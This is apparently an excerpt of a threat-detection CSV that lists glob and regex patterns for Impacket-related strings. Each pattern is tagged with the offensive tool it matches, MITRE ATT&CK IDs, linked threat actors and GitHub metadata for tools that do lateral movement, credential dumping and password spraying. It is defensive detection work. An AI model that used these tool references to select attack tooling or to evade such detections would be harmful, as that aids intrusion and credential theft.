"*impacket-* *",".{0,1000}impacket\-.{0,1000}\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48253"
"*impacket-*.tar.gz*",".{0,1000}impacket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48254"
"*impacket.*",".{0,1000}impacket\..{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","48255"
"*impacket.*",".{0,1000}impacket\..{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","48256"
"*'impacket.*",".{0,1000}\'impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48257"
"*impacket.dcerpc*",".{0,1000}impacket\.dcerpc.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#content","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","48258"
"*impacket.dcerpc*",".{0,1000}impacket\.dcerpc.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","48259"
"*impacket.dcerpc.v5*",".{0,1000}impacket\.dcerpc\.v5.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","48260"
"*impacket.dcerpc.v5*",".{0,1000}impacket\.dcerpc\.v5.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","48261"
"*impacket.examples.secretsdump*",".{0,1000}impacket\.examples\.secretsdump.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48262"
"*impacket.git*",".{0,1000}impacket\.git.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48263"
"*impacket.ImpactPacket*",".{0,1000}impacket\.ImpactPacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48264"
"*impacket.internal_helpers*",".{0,1000}impacket\.internal_helpers.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","48265"
"*impacket.krb5*",".{0,1000}impacket\.krb5.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#content","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","48266"
"*impacket.krb5.*",".{0,1000}impacket\.krb5\..{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","48267"
"*impacket.krb5.asn1*",".{0,1000}impacket\.krb5\.asn1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48268"
"*impacket.krb5.ccache*",".{0,1000}impacket\.krb5\.ccache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48269"
"*impacket.krb5.kerberosv5*",".{0,1000}impacket\.krb5\.kerberosv5.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48270"
"*impacket.ldap*",".{0,1000}impacket\.ldap.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48271"
"*impacket.ldap*",".{0,1000}impacket\.ldap.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","48272"
"*impacket.msada_guids*",".{0,1000}impacket\.msada_guids.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48273"
"*impacket.ntlm*",".{0,1000}impacket\.ntlm.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48274"
"*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","48275"
"*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","48276"
"*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","48277"
"*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","N/A","2","161","21","2025-03-24T07:46:43Z","2021-06-09T19:27:08Z","48278"
"*impacket.smbconnection.SMBConnection*",".{0,1000}impacket\.smbconnection\.SMBConnection.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","48279"
"*impacket/*.py*",".{0,1000}impacket\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48280"
"*impacket:latest*",".{0,1000}impacket\:latest.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48281"
"*impacket:latest*","Impacket\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48282"
"*impacket__init__*",".{0,1000}impacket__init__.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48283"
"*impacket_findDelegation*",".{0,1000}impacket_findDelegation.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","48284"
"*impacket_rpcdump_output_*",".{0,1000}impacket_rpcdump_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","48285"
"*impacket-atexec*",".{0,1000}impacket\-atexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48286"
"*impacket-dcomexec*",".{0,1000}impacket\-dcomexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48287"
"*impacketfile.py*",".{0,1000}impacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","48288"
"*impacket-GetADUsers*",".{0,1000}impacket\-GetADUsers.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48289"
"*impacket-GetNPUsers*",".{0,1000}impacket\-GetNPUsers.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48290"
